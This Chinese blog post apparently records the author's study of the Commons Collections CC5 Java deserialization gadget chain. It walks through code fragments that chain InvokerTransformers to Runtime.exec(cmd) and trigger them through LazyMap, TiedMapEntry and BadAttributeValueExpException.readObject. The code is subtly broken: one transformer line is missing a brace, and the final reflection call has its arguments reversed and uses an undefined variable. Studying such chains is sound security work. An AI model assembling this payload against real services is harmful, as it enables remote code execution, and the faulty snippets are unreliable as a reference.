devbox
很楠不爱3
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Java反序列化CC5链子学习_java cc5

作者:很楠不爱3 | 2024-06-09 16:00:41

java cc5

前言:

Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。

前几天分析学习了一下CC1链子,今天在pte课余的时候学习了一下CC5链子,发现前半部分基本上和CC1基本链子都基本一致

这里先放一下前面的一段链子:

  1. Transformer[] transformers = new Transformer[]{
  2.  
  3.                 new ConstantTransformer(Runtime.class),
  4.  
  5.                 new InvokerTransformer("getMethod",new Class[]{
  6.  
  7.                              String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
  8.  
  9.                 new InvokerTransformer("invoke",new Class[]{
  10.  
  11.                             Object.class,Object[].class,new Object[]{null,new Object[0]}),
  12.  
  13.                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
  14.  
  15.                 };
  16.  
  17.   Transformer transformedChain = new ChainedTransformer(transformers);

前半段的实现逻辑就是主要靠ChainedTransformer的transformer方法完成链子的实现:

  1. public Object transform(Object object) {     
  2.  
  3.  for (int i = 0; i < iTransformers.length; i++) {          object = iTransformers[i].transform(object);      
  4.  
  5. }      
  6.  
  7. return object;  
  8.  
  9. }

下半段的实现逻辑,靠调动TiedMapEntry的getValue(),getValue()又调用了get()方法:

  1. public Object getValue() 
  2.  
  3. {        
  4.  
  5. return map.get(key);    
  6.  
  7. }

而这里的get方法会去调用this,factory的transform方法,靠这里跟上半段完成了衔接,调用了ChainedTransformer,而getValue()方法会由TiedMapEntry的toString方法调用,接下来就是寻找readObject方法了,这里使用的是BadAttributeValueExpException的readObject方法。

  1. private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
  2.  
  3.         ObjectInputStream.GetField gf = ois.readFields();
  4.  
  5.         Object valObj = gf.get("val", null);
  6.  
  7.  
  8.  
  9.         if (valObj == null) {
  10.  
  11.             val = null;
  12.  
  13.         } else if (valObj instanceof String) {
  14.  
  15.             val= valObj;
  16.  
  17.         } else if (System.getSecurityManager() == null
  18.  
  19.                 || valObj instanceof Long
  20.  
  21.                 || valObj instanceof Integer
  22.  
  23.                 || valObj instanceof Float
  24.  
  25.                 || valObj instanceof Double
  26.  
  27.                 || valObj instanceof Byte
  28.  
  29.                 || valObj instanceof Short
  30.  
  31.                 || valObj instanceof Boolean) {
  32.  
  33.             val = valObj.toString();
  34.  
  35.         } else { // the serialized object is from a version without JDK-8019292 fix
  36.  
  37.             val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
  38.  
  39.         }
  40.  
  41.     }

接下来放下半段的poc了,分开放的目的是因为这篇文章主要是为了学习,所以不提供现成的poc了。

  1. Map innerMap = new HashMap();
  2.  
  3. Map outerMap = LazyMap.decorate(innerMap, transformedChain);
  4.  
  5. TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"chd");
  6.  
  7.  
  8.  
  9. BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
  10.  
  11.  
  12.  
  13. Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  14.  
  15. val.setAccessible(true);
  16.  
  17. val.set(poc,badAttributeValueExpException);

希望各位师傅多多指点

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/694831
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号